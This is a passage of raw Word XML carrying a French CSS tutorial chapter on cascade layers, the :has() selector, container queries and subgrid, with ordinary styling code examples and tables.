          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="390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Éléments nus</w:t>
            </w:r>
          </w:p>
        </w:tc>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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>composants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3906"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocs réutilisables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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utilitaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="390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Classes ponctuelles</w:t>
            </w:r>
          </w:p>
        </w:tc>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Forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>surcharges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3906"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exceptions documentées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>La plus forte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COUCHE DE CASCADE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Niveau nommé qui s'insère dans l'ordre de calcul de la cascade, avant la spécificité. Une règle d'une couche supérieure gagne sur toute règle d'une couche inférieure, même moins spécifique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une dépendance contenue dans sa couche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Importer une bibliothèque dans une couche dédiée */</w:t>
        <w:br/>
        <w:t>@import url("librairie.css") layer(librairie);</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* L'ordre final : librairie &lt; reset &lt; base &lt; composants &lt; utilitaires */</w:t>
        <w:br/>
        <w:t>@layer librairie, reset, base, composants, utilitaires;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Placer une bibliothèque dans une couche de faible autorité permet de la surcharger avec un simple sélecteur de classe, sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ni guerre de spécificité.</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L'ORDRE SE DÉCLARE UNE FOIS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Deux déclarations </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@layer a, b;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@layer b, a;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> produisent l'ordre de la première. Déclarez l'ordre en tête de la feuille principale, avant toute règle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">37.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : le sélecteur relationnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sélectionne un élément selon ce qu'il contient. C'est la réponse CSS à de nombreux cas qui exigeaient auparavant du JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre usages concrets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Une carte contenant une image passe en disposition horizontale */</w:t>
        <w:br/>
        <w:t>.carte:has(img) { grid-template-columns: 12rem 1fr; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Un champ suivi d'un message d'erreur visible */</w:t>
        <w:br/>
        <w:t>.champ:has(.erreur:not(:empty)) input { border-color: var(--rouge); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Un formulaire dont une case est cochée */</w:t>
        <w:br/>
        <w:t>form:has(#consentement:checked) button[type=submit] { opacity: 1; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Une section sans titre est masquée */</w:t>
        <w:br/>
        <w:t>section:not(:has(h2)) { display: none; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Tableau 0.119 — Cinq formes de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>:has()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55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Sélecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Question posée</w:t>
            </w:r>
          </w:p>
        </w:tc>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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:has(&gt; img)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enfant direct image ?</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Disposition de carte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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:has(+ p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Frère suivant ?</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Espacement conditionnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:has(:checked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contient un cochage ?</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État de formulaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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:not(:has(h2))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Aucun titre ?</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Masquage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:has(.vide)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contient un état vide ?</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Mise en forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'évalue en remontant depuis la cible : il peut donc coûter cher sur de très grands documents. Utilisez-le sur des conteneurs de composants, pas sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec des sélecteurs profonds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>37.4 Requêtes de conteneur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une media query répond à la taille de la fenêtre. Une requête de conteneur répond à la taille du parent : un même composant peut être compact dans une barre latérale et large dans le contenu principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un composant qui s'adapte à sa place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Déclarer le conteneur */</w:t>
        <w:br/>
        <w:t>.zone-contenu { container-type: inline-size; container-name: carte; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Adapter selon la largeur du conteneur */</w:t>
        <w:br/>
        <w:t>@container carte (min-width: 30rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { grid-template-columns: 12rem 1fr; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte__image { height: 100%; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@container carte (max-width: 20rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte__titre { font-size: 1rem; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="46" name="Picture 46"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f44.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.44 — Deux façons d'adapter un composant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Unités et requêtes de style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Unités de conteneur */</w:t>
        <w:br/>
        <w:t>.carte__titre {</w:t>
        <w:br/>
        <w:t>font-size: clamp(1rem, 4cqi, 1.6rem);   /* cqi = 1 % de la largeur du</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conteneur */</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Requête sur le style, pas la taille */</w:t>
        <w:br/>
        <w:t>@container style(--theme: sombre) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { background: #1b2c3d; color: #e8edf1; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les unités </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cqi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cqb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplacent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour un composant : elles rendent la typographie proportionnelle à son espace réel, sans connaître la fenêtre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">37.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>subgrid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une grille imbriquée peut hériter des pistes de sa grille parente. Sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>subgrid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, les cartes alignent leurs éléments indépendamment et les titres ne se répondent pas d'une carte à l'autre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois cartes aux lignes alignées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.liste-cartes {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: repeat(3, 1fr);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: var(--espace-2);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-rows: subgrid;   /* hérite des lignes du parent */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-row: span 3;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le parent doit définir des pistes explicites, et l'enfant doit couvrir exactement le nombre de lignes héritées. C'est la solution propre pour aligner des en-têtes, des corps et des pieds de cartes sur plusieurs colonnes.</w:t>
